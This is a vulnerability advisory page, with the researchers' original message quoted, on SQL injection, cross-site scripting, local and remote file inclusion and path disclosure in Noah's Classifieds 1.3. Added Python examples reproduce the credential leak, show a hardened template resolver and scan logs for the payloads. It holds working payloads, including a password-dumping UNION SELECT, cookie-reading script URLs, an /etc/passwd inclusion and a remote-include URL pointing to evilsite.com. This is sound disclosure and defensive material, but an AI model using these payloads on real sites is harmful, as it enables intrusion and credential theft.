SecurityTracker.com

SecurityTracker
Archives


 


Category:   Application (Generic)  >   Noah's Classifieds        Vendor:   PhpOutsourcing
Noah's Classifieds Has Multiple Bugs That Let Remote Users Include and Execute Arbitrary Code, Inject SQL Commands, and Conduct Cross-Site Scripting Attacks
SecurityTracker Alert ID:  1015667
SecurityTracker URL:  http://securitytracker.com/id/1015667
CVE Reference:   GENERIC-MAP-NOMATCH
Date:  Feb 23 2006
Impact:   Disclosure of authentication information, Disclosure of system information, Disclosure of user information, Execution of arbitrary code via network, Modification of user information, User access via network
Exploit Included:  Yes  
Version(s): 1.3 and prior versions
Description:   Multiple vulnerabilities were reported in Noah's Classifieds. A remote user can inject SQL commands, conduct cross-site scripting attacks, include local files, and execute arbitrary code. A remote user can also determine the installation path.

The search tool does not properly validate user-supplied input before using it in a database query. A remote user can supply a specially crafted value in an HTTP POST request to the search tool to execute SQL commands on the underlying database. The demonstration value below closes the quoted string and the open parentheses of the application's query, appends a UNION SELECT with the same number of columns as the original query (placing the 'name' and 'password' columns of the classifieds_classifiedsuser table in two of them), and uses INTO OUTFILE to write the result to a file under the installation directory, from where it can be fetched if that directory is served by the web server. The INTO OUTFILE step requires the application's MySQL account to have the FILE privilege and the MySQL server to be able to write to that directory; a plain UNION SELECT without it needs neither.

A demonstration exploit value for the search tool (submitted via HTTP POST) is provided:

kapda%')))/**/UNION/**/SELECT/**/1,1,1,name,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,password/**/INTO/**/OUTFILE/**/'/installation_path/lang/result.text'/**/FROM/**/classifieds_classifiedsuser#
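To make the mechanics concrete, the following added example (not code from the advisory or from Noah's Classifieds) rebuilds the injection against an in-memory SQLite database. The shape of the application's search query, three nested parentheses around a LIKE '%...%' match, is an assumption inferred from the payload's opening  %'))) ; the page's payload is adapted for SQLite by dropping the MySQL-only INTO OUTFILE clause and replacing the '#' end-of-line comment with '--', and both table schemas are constructed here. The parameterised version of the same query shows that the identical input then matches nothing.

```python
import sqlite3

# Payload quoted in the advisory (search tool, submitted via POST).
ADVISORY_PAYLOAD = (
    "kapda%')))/**/UNION/**/SELECT/**/"
    "1,1,1,name,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,password"
    "/**/INTO/**/OUTFILE/**/'/installation_path/lang/result.text'"
    "/**/FROM/**/classifieds_classifiedsuser#"
)


def adapt_for_sqlite(payload):
    """Drop the MySQL-only INTO OUTFILE clause and use SQLite's '--' comment.

    The UNION SELECT itself is left exactly as in the advisory.
    """
    select_part, _, rest = payload.partition("/**/INTO/**/OUTFILE/**/")
    _, _, table = rest.partition("/**/FROM/**/")
    return select_part + "/**/FROM/**/" + table.rstrip("#") + "--"


def union_column_count(payload):
    """Number of columns the attacker had to match in the UNION SELECT."""
    select_list = payload.split("UNION/**/SELECT/**/", 1)[1].split("/**/", 1)[0]
    return len(select_list.split(","))


def build_demo_db():
    """Constructed schema: an ad table with as many columns as the payload's
    SELECT list, plus the user table named in the payload."""
    ncols = union_column_count(ADVISORY_PAYLOAD)
    conn = sqlite3.connect(":memory:")
    cols = ", ".join(f"c{i} TEXT" for i in range(1, ncols + 1))
    conn.execute(f"CREATE TABLE classifieds_ad ({cols})")
    conn.execute(
        f"INSERT INTO classifieds_ad VALUES ({', '.join('?' * ncols)})",
        ["kapda test ad"] + ["-"] * (ncols - 1),
    )
    conn.execute("CREATE TABLE classifieds_classifiedsuser (name TEXT, password TEXT)")
    conn.executemany(
        "INSERT INTO classifieds_classifiedsuser VALUES (?, ?)",
        [("admin", "hunter2"), ("alice", "letmein")],
    )
    return conn


def search_vulnerable(conn, keyword):
    """Assumed vulnerable query: the keyword is concatenated into a LIKE inside
    three parentheses, which is what the payload's leading  %')))  closes."""
    sql = "SELECT * FROM classifieds_ad WHERE (((c1 LIKE '%" + keyword + "%')))"
    return conn.execute(sql).fetchall()


def search_parameterised(conn, keyword):
    """Same query with the keyword bound as a parameter: the input can only
    ever be a LIKE pattern, never SQL."""
    sql = "SELECT * FROM classifieds_ad WHERE (((c1 LIKE ?)))"
    return conn.execute(sql, ("%" + keyword + "%",)).fetchall()


def leaked_credentials(conn):
    """Run the adapted advisory payload through the vulnerable search and pull
    the (name, password) pairs out of the UNIONed rows: column 4 and the last
    column, matching the positions of 'name' and 'password' in the payload."""
    rows = search_vulnerable(conn, adapt_for_sqlite(ADVISORY_PAYLOAD))
    return sorted((r[3], r[-1]) for r in rows if r[0] != "kapda test ad")


if __name__ == "__main__":
    db = build_demo_db()
    print("vulnerable search leaks:", leaked_credentials(db))
    print("parameterised search returns:",
          search_parameterised(db, adapt_for_sqlite(ADVISORY_PAYLOAD)))
```

The column count is read from the payload rather than hard-coded, which is also how an attacker arrives at it in practice: the UNION only succeeds once the SELECT list has exactly as many columns as the application's query.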

The software does not properly filter HTML code from user-supplied input in the 'inf' and 'upperTemplate' parameters before displaying the input. The 'inf' value is read directly from the GET request; the 'upperTemplate' value is only reachable this way when register_globals is enabled, and is echoed into the page whenever it does not end in '.php'. A remote user can create a specially crafted URL that, when loaded by a target user, will cause arbitrary scripting code to be executed by the target user's browser. The code will originate from the site running the Noah's Classifieds software and will run in the security context of that site. As a result, the code will be able to access the target user's cookies (including authentication cookies), if any, associated with the site, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.

Some demonstration exploit URLs are provided:

http://[target]/classifieds/index.php?inf=%3Cscript%3Ealert(document.cookie)%3C/script%3E

http://[target]/classifieds/index.php?upperTemplate=%3Cscript%3Ealert(document.cookie)%3C/script%3E

The 'otherTemplate' parameter is inserted unchecked into an include() call of the form include("./template$otherTemplate.php") in include.php. Because the value is read as a plain PHP variable, register_globals must be enabled. A remote user can supply a value containing '../' sequences to include a file from elsewhere on the target system; if magic_quotes_gpc is disabled, a trailing null byte (%00) truncates the appended '.php' suffix, so files with any extension can be included (with magic_quotes_gpc enabled the null byte is escaped and the truncation fails). An included non-PHP file is returned to the user as-is, disclosing its contents, and any PHP code in an included file, including operating system commands, will run with the privileges of the target web service. PHP 5.3.4 and later reject file paths containing a null byte, and PHP 5.4 removed register_globals and magic_quotes_gpc entirely, so the null-byte variant only affects older PHP installations.

A demonstration exploit URL is provided:

http://[target]/classifieds/index.php?otherTemplate=/../../../etc/passwd%00

If register_globals is enabled, a remote user can set the 'lowerTemplate' (or 'upperTemplate') parameter to a URL. Before including the value, the software only checks that it ends in '.php' and that fopen() can open it, so when PHP's URL wrappers are enabled for include (allow_url_fopen; on PHP 5.2 and later also allow_url_include) the remote file is fetched and its PHP code, including operating system commands, is executed with the privileges of the target web service.

A demonstration exploit URL is provided:

http://example.com/classifieds/index.php?lowerTemplate=http://evilsite.com/evilfile.php
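As an added example (not code from the project or the advisory), the following Python shows two things: what the include() in include.php actually opened for the advisory's 'otherTemplate' value on PHP releases before 5.3.4, which truncated file paths at the first null byte, and how a template-selection parameter should be resolved instead: an allow-list of characters, a fixed directory, and a check that the resolved path stays inside it. The 'template_<name>.php' naming, the demo directory and its file names are assumptions constructed here for the demonstration.

```python
import os
import re
import tempfile
from urllib.parse import unquote

# Advisory's demonstration value as the web server hands it to PHP after
# URL-decoding: the %00 becomes a real NUL byte.
ADVISORY_OTHER_TEMPLATE = unquote("/../../../etc/passwd%00")


def vulnerable_include_path(other_template):
    """Path the application builds: include("./template$otherTemplate.php")."""
    return "./template" + other_template + ".php"


def legacy_php_open_target(path):
    """Emulates PHP before 5.3.4: the path reached the C library as a
    NUL-terminated string, so everything after the first NUL, including the
    forced '.php' suffix, was silently dropped."""
    return path.split("\x00", 1)[0]


# Allow-list for template names (assumed naming scheme template_<name>.php).
TEMPLATE_NAME = re.compile(r"[A-Za-z0-9_-]{1,32}")


def resolve_template(template_dir, requested):
    """Hardened replacement: map a user-supplied template name to a file.

    Returns the absolute path to include, or None if the request is rejected.
    A missing name falls back to template.php, matching the application's
    default branch.
    """
    base = os.path.realpath(template_dir)
    if requested is None:
        return os.path.join(base, "template.php")
    # Allow-list: no '/', '..', NUL byte or URL scheme can pass this.
    if not TEMPLATE_NAME.fullmatch(requested):
        return None
    candidate = os.path.realpath(os.path.join(base, f"template_{requested}.php"))
    # Defence in depth: even a symlinked template must resolve inside the directory.
    if os.path.dirname(candidate) != base:
        return None
    if not os.path.isfile(candidate):
        return None
    return candidate


def make_demo_template_dir():
    """Constructed fixture: a temporary directory with two template files."""
    d = tempfile.mkdtemp(prefix="noah-templates-")
    for name in ("template.php", "template_mobile.php"):
        with open(os.path.join(d, name), "w") as f:
            f.write("<?php // placeholder template ?>\n")
    return d


if __name__ == "__main__":
    print("old PHP opened:",
          legacy_php_open_target(vulnerable_include_path(ADVISORY_OTHER_TEMPLATE)))
    demo = make_demo_template_dir()
    for value in ("mobile", ADVISORY_OTHER_TEMPLATE,
                  "http://evilsite.com/evilfile.php", "../template"):
        print(repr(value), "->", resolve_template(demo, value))
```

The character allow-list alone defeats every value on this page; the realpath comparison is there so that a mistake in the pattern, or a stray symlink in the template directory, still cannot reach a file outside it.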

A remote user can directly request the '/classifieds/gorum/category.php' script, which is intended to be included by other scripts rather than requested on its own; the resulting PHP error output reveals the installation path.

The original advisory is available at:

http://www.kapda.ir/advisory-268.html
http://irannetjob.com/content/view/198/28/ (in Farsi)

trueend5 from Security Science Researchers Institute Of Iran discovered this vulnerability.

Impact:   A remote user can execute arbitrary PHP code and operating system commands on the target system with the privileges of the target web service.

A remote user can access the target user's cookies (including authentication cookies), if any, associated with the site running the Noah's Classifieds software, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.

A remote user can execute SQL commands on the underlying database.

A remote user can determine the installation path.

Solution:   No solution was available at the time of this entry.

The vendor is no longer supporting the product and does not plan to issue a fix.

The file inclusion and 'upperTemplate' issues depend on register_globals being enabled, and the null-byte truncation and the quote-based SQL payload above depend on magic_quotes_gpc being disabled, so hardening those PHP settings (and disabling URL wrappers for include) reduces exposure. This is not a substitute for a fix: the SQL injection itself and the 'inf' cross-site scripting issue do not depend on register_globals.
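Because there is no vendor fix, detecting attempts is the practical next step. The following added example (not part of the advisory) scans Apache combined-format access log lines for the four GET-based patterns on this page: HTML in the 'inf' or 'upperTemplate' parameter, null bytes or traversal in a template parameter, a URL scheme in a template parameter, and direct requests to scripts under /classifieds/gorum/. The log lines are constructed for the demonstration. The SQL injection is sent in a POST body, which the access log does not record, so catching it needs a layer that inspects request bodies.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Constructed sample log (Apache combined format). The first four requests
# reproduce the advisory's demonstration URLs; the last two are benign.
SAMPLE_LOG = """\
203.0.113.5 - - [23/Feb/2006:10:00:01 +0000] "GET /classifieds/index.php?inf=%3Cscript%3Ealert(document.cookie)%3C/script%3E HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.5 - - [23/Feb/2006:10:00:02 +0000] "GET /classifieds/index.php?otherTemplate=/../../../etc/passwd%00 HTTP/1.1" 200 1834 "-" "Mozilla/5.0"
203.0.113.5 - - [23/Feb/2006:10:00:03 +0000] "GET /classifieds/index.php?lowerTemplate=http://evilsite.com/evilfile.php HTTP/1.1" 200 77 "-" "Mozilla/5.0"
203.0.113.5 - - [23/Feb/2006:10:00:04 +0000] "GET /classifieds/gorum/category.php HTTP/1.1" 200 300 "-" "Mozilla/5.0"
198.51.100.7 - - [23/Feb/2006:10:01:00 +0000] "GET /classifieds/index.php?otherTemplate=_mobile HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
198.51.100.7 - - [23/Feb/2006:10:01:05 +0000] "GET /classifieds/index.php?cat=3 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+)[^"]*" (?P<status>\d{3})'
)
TEMPLATE_PARAMS = {"upperTemplate", "lowerTemplate", "otherTemplate"}
ECHOED_PARAMS = {"inf", "upperTemplate"}
URL_SCHEME_RE = re.compile(r"^[a-z][a-z0-9+.-]*://", re.I)
HTML_TAG_RE = re.compile(r"<\s*/?[a-z!?]", re.I)


def classify_request(target):
    """Return a list of (rule, detail) findings for one request target."""
    findings = []
    parts = urlsplit(target)
    # Include files under gorum/ are not meant to be requested directly
    # (the advisory's path-disclosure vector).
    if parts.path.startswith("/classifieds/gorum/") and parts.path.endswith(".php"):
        findings.append(("direct-include-access", parts.path))
    # parse_qs percent-decodes, so %00 becomes a real NUL and %3C becomes '<'.
    for name, values in parse_qs(parts.query, keep_blank_values=True).items():
        for value in values:
            if name in TEMPLATE_PARAMS:
                if "\x00" in value:
                    findings.append(("lfi-null-byte", name))
                if "../" in value or "..\\" in value:
                    findings.append(("lfi-traversal", name))
                if URL_SCHEME_RE.match(value):
                    findings.append(("rfi-remote-url", name))
            if name in ECHOED_PARAMS and HTML_TAG_RE.search(value):
                findings.append(("xss-html-in-param", name))
    return findings


def scan_log(text):
    """Return (client_ip, rule, detail) for every suspicious request in the log."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        for rule, detail in classify_request(m.group("target")):
            hits.append((m.group("ip"), rule, detail))
    return hits


if __name__ == "__main__":
    for ip, rule, detail in scan_log(SAMPLE_LOG):
        print(f"{ip}\t{rule}\t{detail}")
```

Matching is done on the percent-decoded parameter values, so double-encoded or mixed-case encodings of the same payloads still decode to the characters the rules look for; a legitimate template name such as "_mobile" produces no finding.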

Vendor URL:  classifieds.phpoutsourcing.com
Cause:   Input validation error
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)

Message History:   None.


 Source Message Contents

Subject:  [KAPDA::#29]Noah's classifieds multiple vulnerabilities


KAPDA New advisory

Vendor: http://classifieds.phpoutsourcing.com
Vulnerable: Noah's Classifieds 1.3 and below
(the classifieds component for Mambo may also be affected)
Bug: Path Disclosure, SQL Injection, XSS, Local File Inclusion, Remote Code Execution
Exploitation: Remote with browser
Exploit:available

Description:
--------------------
Noah's Classifieds is a general-purpose application
that allows you to set up as many ad categories as you
want, specifying custom fields for each of them.



Vulnerabilities:
--------------------

Path disclosure (direct access to include files)

http://example.com/classifieds/gorum/category.php

--------------------------
--------------------------

SQL Injection (search tool, HTTP method: POST,
condition: MySQL user with FILE privilege)

kapda%')))/**/UNION/**/SELECT/**/1,1,1,name,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,password/**/INTO/**/OUTFILE/**/'/installation_path/lang/result.text'/**/FROM/**/classifieds_classifiedsuser#

--------------------------
--------------------------

Cross site scripting

1-
http://example.com/classifieds/index.php?inf=%3Cscript%3Ealert(document.cookie)%3C/script%3E

/gorum/gorumlib.php
if( isset($HTTP_GET_VARS["inf"]) )
    $infoText=$HTTP_GET_VARS["inf"];   // taken straight from the query string, never escaped
    $sApp=$init->showApp();
    $s.=$globHtmlHead; // important: it must be overridable in the app

---
2-
http://example.com/classifieds/index.php?upperTemplate=%3Cscript%3Ealert(document.cookie)%3C/script%3E
(condition: register_globals=On)

--------------------------
--------------------------

Local file inclusion (condition: magic_quotes_gpc=Off
for non-PHP files)

http://example.com/classifieds/index.php?otherTemplate=/../../../etc/passwd%00

/include.php
if (isset($otherTemplate)) {
    include("./template$otherTemplate.php");
}
else include("./template.php");

--------------------------
--------------------------

Remote code execution (condition: register_globals=On)

http://example.com/classifieds/index.php?lowerTemplate=http://evilsite.com/evilfile.php


/gorum/constants.php
if (!isset($upperTemplate)) $upperTemplate = "<body>\n";
if (!isset($lowerTemplate)) $lowerTemplate = "</body>";

/gorum/gorumlib.php
    // The only "check" before include(): the value must end in .php and fopen() must succeed.
    if (ereg("\.php$",$upperTemplate)) {//just check
        $ret=@fopen($upperTemplate,"r");
        if (!$ret) {
            $infoText = sprintf($lll["incl_header_err"],$upperTemplate);
        }
        @fclose($f);
    }
    if (ereg("\.php$",$lowerTemplate)) {//just check
        $ret=@fopen($lowerTemplate,"r");
        if (!$ret) {
            if (!isset($infoText)) $infoText="";
            $infoText.="<br>".sprintf($lll["incl_footer_err"],$lowerTemplate);
        }
        @fclose($f);
    }
    ...
    // A value ending in .php is included (local or remote file); anything else is echoed into the page (the XSS path).
    $upperTemplate=trim($upperTemplate);
    if (ereg("\.php$",$upperTemplate)) {
        $ret=@include($upperTemplate);
    }
    else $s.="$upperTemplate\n";
    $lowerTemplate=trim($lowerTemplate);

    $s.=$sApp;
    if (ereg("\.php$",$lowerTemplate))
        $ret=@include($lowerTemplate);
    else $s.="$lowerTemplate\n";

}

More details with Exploit
---------
http://www.kapda.ir/advisory-268.html
In Farsi: http://irannetjob.com/content/view/198/28/

Solution:
---------
There is no vendor supplied patch for this issue.

From the vendor's website:
"Currently, we are completely overloaded with our
running projects,
and we don't have enough time to deal with our free
products.
The further development and support of Noah's
Classifieds is therefore suspended.
Thank you for the understanding and please forgive us
that we don't respond to the emails."



Credit :
---------
Discovered & released by trueend5 (trueend5 kapda ir)
Security Science Researchers Institute Of Iran
[http://www.KAPDA.ir]



 
 








Copyright 2019, SecurityGlobal.net LLC